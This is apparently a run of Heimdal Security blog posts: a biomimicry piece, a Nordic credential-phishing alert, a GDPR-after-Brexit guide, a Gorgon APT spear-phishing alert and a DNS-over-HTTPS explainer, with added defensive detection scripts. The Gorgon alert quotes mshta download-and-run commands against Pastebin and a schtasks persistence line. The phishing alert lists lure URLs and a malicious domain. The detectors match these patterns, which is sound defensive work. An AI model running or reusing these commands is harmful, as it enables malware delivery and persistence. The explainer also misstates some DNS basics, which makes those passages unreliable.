“Borrowing from the natural world to safeguard a virtual one” may seem paradoxical, writes Reagan. “But humans have engaged in biomimicry for eons. … Now, as then, we may find some of the best solutions to our problems on nature’s path.”

Potential cybersecurity and biology combo strategies are also offered by the tale, or rather tail, of the lizard — a creature that easily sheds its tail when attacked in order to protect its more vital organs.

The Harvard Business Review, in an article titled “Defeat Hackers with Biomimicry,” explains how this concept can be adapted to cybersecurity. “There may be sacrificial systems or information you can offer up as a decoy for a cyber-predator, in which case an attack becomes an advantage, allowing your organization to see the nature of the attacker and giving you time to add further security in the critical part of your information infrastructure.”

The belief that biomimicry is crucial to the future of cybersecurity is taken a step further in a piece penned by a biomimicry expert and a cyber CEO. In “Only Biomimicry Will Save Cybersecurity,” Idriss Aberkane and Stuart McClure write that biomimicry may even offer the promise of developing something resembling a virtual immune system.

“Deep learning mimics nature: Looking at the Internet as an organism, we can attempt to copy the way organisms ensure their internal security,” they write. “Tomorrow’s security software will evolve as a predator-prey dynamic system, with each software population acquiring new characteristics until the entire system stabilizes its software diversity the same way an ecosystem stabilizes its biodiversity.”

Finally, while not speaking specifically about biomimicry, another tech visionary also seemed to grasp the potential for applying the study of living organisms to the world of computers (thus successfully blending the best of cybersecurity and biology). Apple founder Steve Jobs once said, “I think the biggest innovations of the 21st century will be at the intersection of biology and technology. A new era is beginning.”

About the Author:

Michelle Moore, Ph.D., is an academic director and adjunct professor for the University of San Diego’s innovative, online Master of Science in Cyber Security Operations and Leadership program. She is also a researcher, author and cybersecurity policy analyst with over two decades of private-sector and government experience as a cybersecurity expert.

The post Cybersecurity and Biology: Biomimicry and Innovation Inspired by Nature appeared first on Heimdal Security Blog.

SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries

People in Nordic countries and beyond should beware: there’s a new credential stealing campaign up and running. For now, it seems to be hitting mostly these countries, but there’s no telling when it will extend to the rest of the world. Where there’s (illicit) money to be made, hackers are restless.

How the New Nordics Credential Stealing Campaign Works

As far as we’ve seen so far, the new Nordics credential-stealing campaign is targeting work email accounts. The malicious message pretends to be part of a previously agreed-upon conversation: the document is introduced as a link, without much explanation.

This is what a typical email looks like:

Fra: [sender email address]
Sendt: 2. oktober 2019 09:56
Emne: Doc
Prioritet: Høj

Hei

Finn vedlagte dokument

Vis Dokument (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29)

Med vennlig hilsen

[Name

Phone, Email, Company name etc.]

Translated into English, this email would be this:

From: [sender email address]
Posted: October 2, 2019 9:56 AM
Subject: Doc
Priority: High

Hi

Find the attached document

View Document (https://amagauto-my.sharepoint.com/personal/senad_ljubuncic_amag_ch/_layouts/15/WopiFrame.aspx?sourcedoc={7ea83df5-6fc6-4c9c-9b65-fb8806b565be}&action=view&wd=target%28Document.one%7C97f58f57-7285-4f70-8af0-fb5d7d3e3b82%2FPDF%20002%7C4c8df191-241d-4d43-91b6-b3658f3bcdca%2F%29)

With best regards

[Name

Phone, Email, Company name etc.]

What happened next, if the user clicked that link?

They were redirected to a picture of a document (not even a real document). The picture had a hyperlink inserted on it, so when the user clicked it, they were taken to a malicious page.


The fraudulent page then asked users to log in with whatever account they had: Yahoo, Office 365, Gmail, etc.


A day later, the Nordics credential stealing campaign took on a new form. This time, the malicious document link was this one instead: https://farmtools-my.sharepoint.com/personal/johanna_ratia_farmtools_fi/_layouts/15/WopiFrame.aspx?sourcedoc={b70a453e-0c44-45f5-8a31-01d022e88a43}&action=view&wd=target%28Document%20Library.one%7C53cc22f2-1e03-4b9b-8bc5-9b8bc9980cb7%2FScan0000495%7C5773954c-e41f-4956-859b-56edd77199ed%2F%29

In both cases, the malicious portal behind the fake links was https://lazzysisland.com.
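The lure chain above has a recognisable shape at the mail gateway: a terse message, an "attached document" that is really a link, and a OneNote page on a SharePoint personal site whose tenant has nothing to do with the sender. The following heuristics are an added example written for this page, not Heimdal's code; the two sample messages, the example.org/contoso domains and the GUIDs are constructed.

```python
"""Heuristic checks for the lure described above: a terse message whose only
content is a link to a OneNote page on a SharePoint personal site that does not
belong to the sender. Example code added to this page (not Heimdal's); the two
sample messages are constructed, with placeholder GUIDs, not captured emails."""
import re
from urllib.parse import parse_qs, urlparse

URL_RE = re.compile(r"https?://[^\s<>()\"']+", re.IGNORECASE)
# English and Norwegian wording for "attached", as seen in the lure above
ATTACHMENT_WORDS = re.compile(r"\b(attached|attachment|vedlagte)\b", re.IGNORECASE)


def sharepoint_tenant(host):
    """'contoso-my.sharepoint.com' -> 'contoso'; None for any other host."""
    host = (host or "").lower()
    suffix = "-my.sharepoint.com"
    return host[: -len(suffix)] if host.endswith(suffix) else None


def analyze_link(url, sender_domain):
    """Return the reasons a single SharePoint personal-site link looks suspicious."""
    reasons = []
    parsed = urlparse(url)
    tenant = sharepoint_tenant(parsed.hostname)
    if tenant is None:
        return reasons  # only OneDrive/SharePoint personal sites are scored here
    # A personal site in a tenant unrelated to the sender's own domain suggests
    # a hijacked or throwaway account is hosting the lure.
    if tenant not in sender_domain.lower().split("."):
        reasons.append(f"sharepoint_tenant_mismatch:{tenant}")
    # The campaign linked a OneNote page (wd=target(<name>.one|...)) rendered by
    # WopiFrame.aspx; parse_qs already percent-decodes the parameter value.
    target = parse_qs(parsed.query).get("wd", [""])[0]
    if parsed.path.lower().endswith("/wopiframe.aspx") and ".one|" in target.lower():
        reasons.append("onenote_page_link")
    return reasons


def analyze_message(sender, subject, body, has_attachment):
    """Score one message; 'suspicious' when at least two independent signals agree."""
    sender_domain = sender.rsplit("@", 1)[-1]
    links = URL_RE.findall(body)
    reasons = []
    for link in links:
        reasons.extend(analyze_link(link, sender_domain))
    if links and ATTACHMENT_WORDS.search(body) and not has_attachment:
        reasons.append("claims_attachment_but_only_link")  # "Find the attached document" + a link
    if links and len(body.split()) < 15:
        reasons.append("terse_body_with_link")
    return {"subject": subject, "reasons": reasons, "suspicious": len(reasons) >= 2}


# Constructed samples (placeholder GUIDs and example domains), not real emails.
SUSPICIOUS_MESSAGE = {
    "sender": "partner@example.org",
    "subject": "Doc",
    "body": (
        "Hi\n\nFind the attached document\n\n"
        "View Document (https://contoso-my.sharepoint.com/personal/jane_doe_contoso_com"
        "/_layouts/15/WopiFrame.aspx?sourcedoc={00000000-0000-0000-0000-000000000001}"
        "&action=view&wd=target%28Document.one%7C00000000-0000-0000-0000-000000000002"
        "%2FPDF%20002%7C00000000-0000-0000-0000-000000000003%2F%29)\n\n"
        "With best regards\nPartner"
    ),
    "has_attachment": False,
}
BENIGN_MESSAGE = {
    "sender": "jane.doe@contoso.com",
    "subject": "Q3 budget notes",
    "body": (
        "Hi team, as discussed in yesterday's meeting, here are the Q3 budget notes. "
        "I have shared the OneNote section from my own OneDrive so everyone can add "
        "comments before Friday: https://contoso-my.sharepoint.com/personal/"
        "jane_doe_contoso_com/_layouts/15/WopiFrame.aspx?sourcedoc={00000000-0000-0000"
        "-0000-000000000004}&action=view&wd=target%28Budget.one%7C00000000-0000-0000-"
        "0000-000000000005%2F%29 Thanks, Jane"
    ),
    "has_attachment": False,
}

if __name__ == "__main__":
    for message in (SUSPICIOUS_MESSAGE, BENIGN_MESSAGE):
        print(analyze_message(**message))
```

A link from a colleague's own tenant with a normal body scores only one signal and is left alone; the lure scores four.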

How to Stay Safe from the New Nordics Credential Stealing Campaign

If you have an active Thor Foresight or Thor Premium subscription you are automatically protected from the malicious links above.

But if you’re not – and even if you are – make sure you’re ready for the next round. This campaign or another one like it will be back.

The best way to deal with them is to stay on your guard:

  • Don’t open documents and don’t click any links in emails from people you don’t know;
  • Be proactive about your cybersecurity and have a DNS traffic filter (like Thor Foresight – either for Home or Enterprise);
  • Stay informed about credential stuffing (why criminals might want to steal your credentials) and about phishing in general;
  • If you are part of managing an organization (which means you and your employees will be huge targets for all sorts of phishing attempts), learn about business email compromise (BEC) and about MailSentry™, a cybersecurity solution specially designed to block BEC attacks of any kind.

Stay safe!

The post SECURITY ALERT: New Credential Stealing Campaign Hits Nordic Countries appeared first on Heimdal Security Blog.

GDPR after Brexit: No Deal and All Other Exit Scenarios Explained

As the British MPs and the EU representatives continue to discuss the specifics of the upcoming Brexit, nothing is settled yet. In this murky context, companies in the UK, and companies working with companies in the UK, are rightly confused.

What about GDPR, the transnational European data protection regulation to which we were just beginning to adjust?

Will there still be a GDPR after Brexit, for the UK space?

If it will change, how so?

Should a new kind of data protection compliance regulation be created for the UK instead of GDPR?

All these topics are intensely debated right now across all business mediums. Unfortunately, there’s a lot of uncertainty and a lot of Brexit and GDPR myths as well.

Let’s walk through everything together and see what will really happen with GDPR after Brexit on all possible scenarios.

Possible Brexit Scenarios

For now, British politicians are still stuck debating whether they want to accept the deal on the table or go for a no-deal situation.

There are several possible outcomes, depending on what will be decided on these counts:

  • If they choose to comply with the new law (accept the deal) or not;
  • If they ask for a delay in deciding (Brexit and the deal-or-no-deal debate simply get postponed);
  • If they try to negotiate a new deal;

Regardless of what happens next, the UK and companies connected to this space will still need to deal with GDPR. The GDPR after Brexit issue is not going anywhere.

Even in the most extreme outcomes, data compliance will still be on the agenda. Let’s take a few examples.

A. GDPR after Brexit with a deal

Within the deal currently on the table, GDPR is also stipulated as a must. If the British MPs somehow agree on the deal before the 31st of October deadline, then Brexit goes through as planned. GDPR would be part of the deal with the EU, so the current data compliance regulations stay in place.

In this case, you have nothing to change: GDPR rules stay in place as they are.

B. GDPR if Brexit is delayed and renegotiated

If the British MPs ask for a deadline extension in the hope of reaching a consensus by then, GDPR essentially remains in place. Until the new deal is discussed and agreed upon, the UK does not technically leave the EU.

That means all European laws and UK-EU agreements stay the same as they were, including the GDPR, at least for the deadline extension.

The political party which initiated Brexit and continues to support it strongly says delaying is not an option. But considering that Parliament can’t seem to reach a consensus on how and when to exit the EU, or even on the idea of exiting at all, a delay is very possible.

C. GDPR after Brexit with no deal (Hard Brexit)

If, let’s say, the UK representatives refuse to comply and accept the deal, this will probably open up a whole can of worms of legal contention.

Until the issues are hashed and rehashed through courts, GDPR will become a big question mark.

One way or another, as the British minister in charge of data protection, Baroness Neville-Rolfe, has recently said, even if GDPR no longer applies in the UK, some very similar legislation will need to be put in place.

“One thing we can say with reasonable confidence is that if any country wishes to share data with EU member states, or for it to handle EU citizens’ data, they will need to be assessed as providing an adequate level of data protection,” Neville-Rolfe said. “This will be a major consideration in the UK’s negotiations going forward.”

While it’s not clear if the UK will still adhere to GDPR after Brexit, or adhere to a similar framework (such as the Privacy Shield, see below), or submit to being independently evaluated,

Useful Info for a GDPR after a No-Deal Brexit:

  • The documents and criteria for the EU’s adequacy decisions (how they decide a country provides adequate data protection and is therefore trustworthy);
  • The Privacy Shield Framework: a framework which allows people to transfer their personal data from the EU to the US while maintaining GDPR standards. There is the possibility for the UK to adhere to it or create a similar framework;
  • The Official GDPR FAQs – on the main GDPR portal.

There are 5 possible scenarios for a GDPR after Brexit with no deal, depending on your role in the data ecosystem.

We’ll tackle each one, but rest assured that the matter of data protection will not return to its pre-GDPR state. Once the world started taking data protection and privacy concerns seriously (and rightly so), there’s no turning back.

Here are the 5 possible scenarios for GDPR after Brexit with no deal:

In all data exchanges, we can speak of data controllers and data processors.

Data controllers are the business entities which collect the data of their clients and contacts (often in order to provide them with services) AND decide the purposes for which that data will be processed.

Data processors are the business entities which process the data on behalf of a data controller (besides any employees of the controller).

Data subjects are the people whose personal data is being processed.

We’ve drawn the 5 possible scenarios for a GDPR after Brexit, depending on the role of the business in the data flow.

  • Scenario 1: Controllers in the UK, providing services for UK people and entities and sharing no personal data with organizations outside the UK;
  • Scenario 2: Controllers in the UK, providing services for the UK but involved with processors in the EU (or anywhere else outside the UK);
  • Scenario 3: Controllers in the UK, providing services for people and business entities in the EU;
  • Scenario 4: Processors in the UK, acting on behalf of controllers or processors in the EU (or UK and EU);
  • Scenario 5: Processors in the UK, acting on behalf of controllers or processors in the UK.

#1. Scenario 1

This scenario is rather simple. Even though there are not a lot of cases like this in real life, since data circulation is never as tightly sealed as this, it has to be covered by any guide.

If you’re among the rare few UK controllers who only provide services to the UK and have no exchanges with non-UK processors, you’re lucky. You don’t really need to concern yourself with GDPR after Brexit.

The data protection laws you will need to abide by after Brexit are going to be more or less the same as the ones you are used to and will be communicated by UK authorities in due time.

It’s quite possible that after the UK leaves the EU with no deal, the controllers doing business solely in the UK will need to comply with the Data Protection Act 2018 (DPA2018) instead of the GDPR. Another likely possibility is that GDPR will be absorbed into the UK’s own laws upon Brexit (even with no deal).

In any case, the controllers defined by scenario 1 are the least affected by the GDPR after Brexit issue, because nothing will actually change for them.

#2. Scenario 2

Most small UK businesses fall into this category of controllers in the UK who are involved with processors outside the UK. Basically, anyone who uses international software like Microsoft, Facebook, Dropbox, and so on, fits into this second scenario.

Legally, nothing really changes in this case either, because GDPR after Brexit will mean adopting the UK data protection law, DPA2018 (linked above). Since the processors outside the UK will still be compliant with GDPR, there is nothing that hinders these UK controllers from continuing to use their services.

#3. Scenario 3

In scenario 3, the UK controllers are not just working with non-UK processors; they are also serving EU-based clients, have EU offices, and so on. In this case, the situation is a bit murkier.

The problem is that communicating between various branches and entities involved in the business process might be stalled by GDPR after Brexit.

To be proactive about it, you can designate a DPO (Data Protection Officer) in each country you have offices in, and that should cover the conditions imposed by the EU on third countries (which the UK will effectively become).

This will solve compliance issues, but be warned that handling GDPR after Brexit in paperwork terms might not be the worst of it. Because of the extra hassle involved, it’s very likely that obtaining more clients in the EU market will be difficult. It will be harder to compete with EU controllers who don’t have post-Brexit ambiguity to sort through.

#4. Scenario 4

After May 2018, all processors in the UK who were working with EU organizations were required to have them sign contracts which stipulated how their data would be handled. The issue here is that those contracts and agreements mentioned the UK as an EU country, which will no longer be true.

This means that all this paperwork will need to be redone. It’s best if you are proactive and start sending out the revised forms as soon as the Brexit decision is concluded one way or another.

There is the risk that some of your business partners will decline to re-sign, but you do the best with what you have and move on. Continuing to do business with them in the absence of flawless paperwork is too great a risk to take.

#5. Scenario 5

For processors in the UK working only with data of people within the UK (and for controllers in the UK), the same applies as in Scenario 1. In other words, nothing changes, there is no extra concern to be had.

Cybersecurity Risks of GDPR after Brexit: A Few Words of Caution

As you can see by now, GDPR after Brexit will bring a lot of paperwork in many cases. Not just paperwork, but also a lot of communications going on with partners across national frontiers.

Since these communications will not be your standard, run-of-the-mill exchanges (the Brexit situation is new to everyone), they can be a huge opportunity for cybercriminals.

Be wary of any email you receive about Brexit and GDPR matters, especially if the sender is prompting you to do something involving vulnerable data. Don’t enter your login details on any page (could be a phishing attempt), don’t engage in conversations with people you don’t really know from before, etc.

Business Email Compromise (BEC) is a growing and costly threat. The little chaos which will likely flood everyone’s emails concerning GDPR after Brexit is the perfect opportunity for BEC attacks.

Spam filters are not enough to tackle it – you need to do some thorough background checks with every email and to also have an email security solution specially designed to counter BEC attacks.

Wrapping it up

I hope this guide helped clear the confusion surrounding GDPR after Brexit. In any case and however convoluted the Brexit process will continue to be, you should take some steps to prepare for the future.

Just look up your own business situation in the scenarios above and find out what you can expect, even if we end up with a no-deal Brexit. Good luck, and drop us a line with any concern you might have.

The post GDPR after Brexit: No Deal and All Other Exit Scenarios Explained appeared first on Heimdal Security Blog.

SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign

The Gorgon APT (Advanced Persistent Threat) is an older but dangerous online threat, first discovered by Unit 42 researchers in February 2018.

The group behind the Gorgon APT was revealed while the researchers were still investigating an attacker known as Subaat, when they realized that Subaat was probably part of a larger group targeting governmental organizations.

The History of Attacks by Gorgon APT

Ever since its initial discovery in February 2018, the Gorgon APT has been orchestrating attacks both on government organizations (in the United States, United Kingdom, Russia, Spain, and others) and on corporate targets around the world.

The Gorgon group has often shared infrastructure when performing criminal and nation-state targeted attacks. This made the APT easier to track across these operations.

Within the Gorgon APT infrastructure, the researchers were able to identify several crimeware family samples, including Trojans, RATs like NjRat and info stealers such as LokiBot. These were all hosted on the command and control (C2) domain of the Gorgon group.

Interestingly, the Gorgon APT didn’t just use the traditional C2 strategies we could expect from it. It also used a variety of URL shortening services in order to download its payloads. This made its criminal activity more widespread and potentially more complex to track down, identify and eradicate.

The Current Spear Phishing Campaign by Gorgon APT

While the activities of the Gorgon APT have flared on and off from February 2018 until now, the group is now back in force with a new spear-phishing campaign.

So far, the targets we have intelligence about are located in Europe, but everyone else should be on guard too. It begins with an email containing this text (sanitized for your safety):

Subject:

Re: Invoice_74521451

Content:

Dear Sir

My colleague handling this order is out of office for his vacation.

Please confirm the attached invoice as enabling us to proceed with the payment schedule.

Regards,

Sri Astuti

Attached:

Invoice_74521451.xls

As you can see, the bait here is the attached Excel document. Once the target opens it, the malicious file delivers the payload. The XLS file contains macro (VBA) code which gets executed once the document is opened.

Just like in its previous attacks, the Gorgon APT then connects to Pastebin and downloads and runs obfuscated JavaScript / VBA code from there.

This is done by spawning a shell with the following command:

mshta http://bit[.]ly/mydahsgkjshwodakiterikus

–>

"C:\Windows\System32\mshta.exe" http://www.pastebin[.]com/raw/0php6n7G

This leads to several layers of unescape obfuscation that redirect the traffic to a number of other Pastebin addresses (sanitized for your safety):

http:\\pastebin[.]com\raw\TNnFtBjw

–>

http:\\pastebin[.]com\raw\3qUvqbpZ

It then creates a scheduled task that re-downloads the payload at regular intervals (sanitized for your safety):

"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 /tn "DEFENDER Backup" /tr "mshta http:\\pastebin[.]com\raw\3qUvqbpZ"

A total of three script obfuscation methods are used: “StrReverse”, “split variables” and “multiple Wscript objects”.

The payload uses the .NET Framework’s reflection API (the “LoadWithPartialName” method of “Assembly”) in order to download and process raw data in memory.

The final payload is a data stealer that communicates with multiple domains, all of which have already been blocked in Heimdal’s Thor Foresight engine.

The malicious XLS document is detected by 8 out of 57 Antivirus products listed by VirusTotal. This means that you can’t rely solely on your Antivirus to stay safe.
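Since antivirus alone misses the document, the execution chain itself is the better detection surface: an Office process spawning mshta.exe with a URL, and schtasks.exe creating a task whose action is another mshta fetch from Pastebin. The rules below are an added example for this page, not Heimdal's or Thor Foresight's logic; the log lines are constructed to resemble process-creation events, with placeholder URLs in place of the real ones.

```python
"""Detection logic for the execution chain described above: an Office app
spawning mshta.exe with a remote URL, and schtasks.exe persisting a further
mshta fetch from Pastebin. Example code added to this page (not Heimdal's);
the log lines are constructed to resemble process-creation events, not real telemetry."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Hosts the campaign used for staging; extend this from your own threat intel.
PASTE_OR_SHORTENER_HOSTS = ("pastebin.com", "bit.ly")
# Accepts both http://host/path and the backslash form seen in the sanitized commands
URL_RE = re.compile(r"https?:[/\\]{2}[^\s\"']+", re.IGNORECASE)
TASK_ACTION_RE = re.compile(r'/tr\s+"?([^"]+)"?', re.IGNORECASE)

# Constructed sample events (key=value pairs separated by '|'), placeholder URLs.
SAMPLE_LOG = [
    r'ParentImage=C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE'
    r'|Image=C:\Windows\System32\mshta.exe'
    r'|CommandLine=mshta http://bit.ly/PLACEHOLDER-SHORTLINK',
    r'ParentImage=C:\Windows\System32\mshta.exe'
    r'|Image=C:\Windows\System32\schtasks.exe'
    r'|CommandLine="C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 300 '
    r'/tn "DEFENDER Backup" /tr "mshta http://pastebin.com/raw/PLACEHOLDERID"',
    r'ParentImage=C:\Windows\explorer.exe'
    r'|Image=C:\Windows\System32\notepad.exe'
    r'|CommandLine=notepad.exe C:\Users\alice\notes.txt',
    r'ParentImage=C:\Windows\System32\svchost.exe'
    r'|Image=C:\Windows\System32\schtasks.exe'
    r'|CommandLine=schtasks /create /sc DAILY /tn "Nightly Backup" /tr "C:\Tools\backup.exe"',
]


def parse_event(line):
    """Split 'Key=Value|Key=Value' into a dict; the first '=' of each field separates key and value."""
    event = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key] = value
    return event


def image_name(path):
    """Lower-cased file name of a Windows path ('C:\\X\\MSHTA.EXE' -> 'mshta.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of every rule the event matches (empty list = nothing to flag)."""
    hits = []
    image = image_name(event.get("Image", ""))
    parent = image_name(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    urls = URL_RE.findall(cmd)
    if image == "mshta.exe" and urls:
        hits.append("mshta_remote_script")          # mshta fetching script from a URL
    if image == "mshta.exe" and parent in OFFICE_APPS:
        hits.append("office_spawns_mshta")          # macro-driven LOLBin launch
    if image == "schtasks.exe" and "/create" in cmd.lower():
        match = TASK_ACTION_RE.search(cmd)
        action = match.group(1) if match else ""
        if "mshta" in action.lower() or URL_RE.search(action):
            hits.append("schtasks_persists_mshta")  # scheduled re-download of the payload
    if any(host in url.lower() for url in urls for host in PASTE_OR_SHORTENER_HOSTS):
        hits.append("paste_or_shortener_url")
    return hits


def scan(lines):
    """Return (line index, matched rules) for every event that matched at least one rule."""
    findings = []
    for index, line in enumerate(lines):
        hits = classify(parse_event(line))
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(index, ", ".join(hits))
```

The two benign events (notepad, and a scheduled task whose action is a local executable) produce no hits, so the rules key on the LOLBin-plus-URL combination rather than on schtasks or mshta alone.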

How to Stay Safe from the Gorgon APT and other Spear Phishing Campaigns:

#1. Don’t trust emails from people you don’t know

As much as possible, do not open attachments or click links from emails coming from unknown contacts. I know that in a professional environment this is virtually impossible but try to do your best.

You can read the emails, but don’t click links or open attachments until you establish more contact background. Reach out and ask the sender to remind you where you were acquainted or what deal they are bringing up.

Ideally, find a way to verify the sender’s legitimacy independently of further email threads. Pick up the phone and give them a call. Ask who introduced you, whether they are legitimate, and how well they know them.

#2. Don’t enter your credentials anywhere without extra checks

If you find yourself on a website or portal that looks like one you trust (Google, Facebook, Outlook, Salesforce, etc.) but which asks you to re-enter your credentials, don’t do it. No matter how much it looks like the real deal, it could be a spear-phishing attempt.

Make sure you check and double-check that the website address is correct, with no alterations. If you have any doubts, don’t enter your credentials. If it’s indeed necessary, you will be prompted to do it in the mail portal / app that you use, anyway.

#3. Have an email security solution firmly in place

Run your incoming emails through a solution which prevents BEC attacks, to make sure online crooks are not trying to fool you. Business Email Compromise (BEC) attacks are a growing threat, and your email spam filter or firewall is not enough to halt them.

Final word

Last, but not least, stay vigilant. Learn how social engineering works, and how cybercriminals can get into your accounts. Keep learning more about cybersecurity so nothing can catch you by surprise.

If you’re interested, sign up for our Cybersecurity Course for Beginners. It’s completely free and you can learn everything at your own pace. Stay safe!

The post SECURITY ALERT: Gorgon APT Targets Corporate Emails with Spear Phishing Campaign appeared first on Heimdal Security Blog.

Enabling DNS over HTTPS (DoH): Advantages and Best Practices

A new internet protocol is making headlines in the world of enterprise security: DNS over HTTPS. Even though this is of major interest especially for businesses and organizations, regular users will be impacted by it as well. Are you ready for this cybersecurity revolution yourself?

Here’s what all the fuss about the new DoH protocol is about. If it is done right, the hype around it is well-deserved: once it’s implemented well, DoH can make network communications much more secure.

DNS over HTTPS is still relatively new in the world of network connections. It first emerged about two years ago, and the protocol is mostly not implemented yet.

When it comes to browsers, Google seems to be the first to adopt it. They recently announced that they plan to roll out DNS over HTTPS in the near future.

This guide will tell you what this means and how you can implement DNS over HTTPS yourself, the changes to expect and so on.

What Is DNS over HTTPS (DoH) and How Does This Protocol Work?

First things first, let’s clear up the basics. Not everyone understands exactly what DNS is and how it works, let alone the new DNS over HTTPS.

DNS definition:

DNS stands for Domain Name Server, and it helps computer networks attach various information to each web domain. To put it simply, the Domain Name Servers are the fundamental address book of the internet.

But while people can remember a domain name easily, computers need numbers to understand it. That’s why the DNS system ‘translates’ each domain name into an IP address and stores this mapping together with other details.

A DNS traffic filtering solution is a crucial security layer for businesses and consumers alike. We discussed elsewhere the importance of DNS traffic filtering and what cybercriminals can hope to get from infiltrating it.

Now that we defined DNS and DNS filtering, let’s move on to the new buzzword in cybersecurity news: DNS over HTTPS (DoH).

DNS over HTTPS (DoH) definition:

The new standard released by the IETF carries the DNS protocol over HTTPS connections (the more secure form of HTTP).

DNS over HTTPS (abbreviated as DoH) is an internet security protocol which communicates domain name server information in an encrypted way over HTTPS connections.

DNS over HTTPS vs. DNS over HTTP vs. DNS over TLS

A. DNS over HTTP vs DNS over HTTPS

Most networks still use DNS over HTTP communications, which leaves them vulnerable to man-in-the-middle attacks if they are not protected by a traffic filtering solution, because this communication is sent in plain text.

The innovation brought on by the DNS over HTTPS protocol is that the communication is encrypted using built-in application HTTPS standards. This helps achieve an unprecedented default level of privacy and data protection since the encryption is (or should be) the golden standard.

Man-in-the-middle attacks (a common cybersecurity concern) become largely ineffective once DNS over HTTPS is enabled. Since all DNS requests are encrypted, a third-party observer cannot make sense of the data they would glean.

If that data is not encrypted (as in the DNS over HTTP protocol), it is easy for a malicious third-party observer to see what domains you are trying to access. In contrast, when DoH is active, this data is encrypted and hidden within the enormous amount of HTTPS data which passes through the network.

Therefore, there is no comparison to be drawn between DNS over HTTPS (DoH) and DNS over HTTP. DoH is clearly the superior protocol. It’s only a matter of time until everyone adopts it one way or another, and the road may indeed be difficult for a time.

B. DNS over HTTPS vs. DNS over TLS

I think we’ve cleared up by now what DNS over HTTPS (DoH) is.

DNS over TLS (or DoT) is regarded by some as being more or less the same thing as DoH, but this is not accurate. It’s true that both protocols achieve the same result: encrypting your DNS communications.

But the two protocols use a different port for this encryption, and each has a different focus. DoH, in theory, still allows network admins to view the encrypted DNS traffic should an issue arise, while DoT can protect the data even from admins.

The fans of DoT protocols state that this DNS over TLS standard is a better fit for human rights concerns in problematic countries. At the same time, in countries where freedom of speech may be limited, the only effect of enabling DoT encryption may be that it draws attention. In other words, authoritarian regimes may look unfavorably upon those who adopt DoT instead of the more mainstream DoH.

Other than that, there is also the technical difference of the port used. DNS over TLS has its own dedicated TLS port, Port 853. DNS over HTTPS uses a different one, Port 443. This internet port (Port 443) is the current standard for all HTTPS communications, so it makes sense that DoH uses it too.
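To make the definition and the port comparison above concrete, here is an added example (not code from the original post) of the RFC 8484 framing: the DNS message itself is the same wire format that normally travels over port 53, and DoH simply wraps it in an HTTPS request on port 443, so TLS, not the DNS format, provides the confidentiality, and the DoH resolver you send it to still sees every query in clear. The `/dns-query` path, the `example.com` name and the reply address are constructed sample values, and nothing is sent over the network.

```python
"""DNS over HTTPS (RFC 8484) framing, shown offline with constructed data.
The DNS wire message is unchanged; only the transport (HTTPS) differs."""
import base64
import struct

DOH_PATH = "/dns-query"   # assumed resolver path (common public DoH endpoints use it)
QTYPE_A = 1


def encode_name(name: str) -> bytes:
    """Encode 'example.com' as DNS labels: \\x07example\\x03com\\x00."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("idna")
        if not 0 < len(raw) < 64:
            raise ValueError(f"bad label length in {name!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def build_query(name: str, qtype: int = QTYPE_A, qid: int = 0) -> bytes:
    """Standard DNS query: 12-byte header + one question, RD bit set.
    RFC 8484 suggests ID 0 so identical GET URLs stay cache-friendly."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def doh_get_path(query: bytes) -> str:
    """GET form: the message goes in ?dns= as base64url without padding."""
    b64 = base64.urlsafe_b64encode(query).rstrip(b"=").decode("ascii")
    return f"{DOH_PATH}?dns={b64}"


def read_name(msg: bytes, off: int):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, jumped, end = [], False, off
    for _ in range(128):                      # hard stop against pointer loops
        ln = msg[off]
        if ln & 0xC0 == 0xC0:                 # compression pointer (0xC0xx)
            if not jumped:
                end = off + 2
            off = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            jumped = True
            continue
        off += 1
        if ln == 0:
            break
        labels.append(msg[off:off + ln].decode("idna"))
        off += ln
    else:
        raise ValueError("compression pointer loop")
    return ".".join(labels), (end if jumped else off)


def parse_response(msg: bytes) -> dict:
    """Parse an application/dns-message reply body; collects A records."""
    qid, flags, qd, an, _, _ = struct.unpack("!HHHHHH", msg[:12])
    off = 12
    questions, answers = [], []
    for _ in range(qd):
        qname, off = read_name(msg, off)
        qtype, _ = struct.unpack("!HH", msg[off:off + 4])
        off += 4
        questions.append((qname, qtype))
    for _ in range(an):
        rname, off = read_name(msg, off)
        rtype, _, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == QTYPE_A and rdlen == 4:
            answers.append((rname, ttl, ".".join(map(str, rdata))))
    return {"id": qid, "rcode": flags & 0x000F,
            "questions": questions, "answers": answers}


def sample_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Constructed reply (not captured traffic): echoes the question and adds
    one A record whose name is a pointer (0xC00C) to the question name."""
    hdr = struct.pack("!HHHHHH", 0, 0x8180, 1, 1, 0, 0)   # QR, RD, RA, rcode 0
    rr = b"\xc0\x0c" + struct.pack("!HHIH", QTYPE_A, 1, ttl, 4)
    rr += bytes(int(p) for p in ip.split("."))
    return hdr + query[12:] + rr


if __name__ == "__main__":
    q = build_query("example.com")
    print("GET", doh_get_path(q), "(Accept: application/dns-message)")
    print(parse_response(sample_response(q, "93.184.216.34")))
```

The same `build_query` bytes sent as a UDP datagram to port 53 would be readable by anyone on the path; in the DoH form they are only the body of an HTTPS request.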

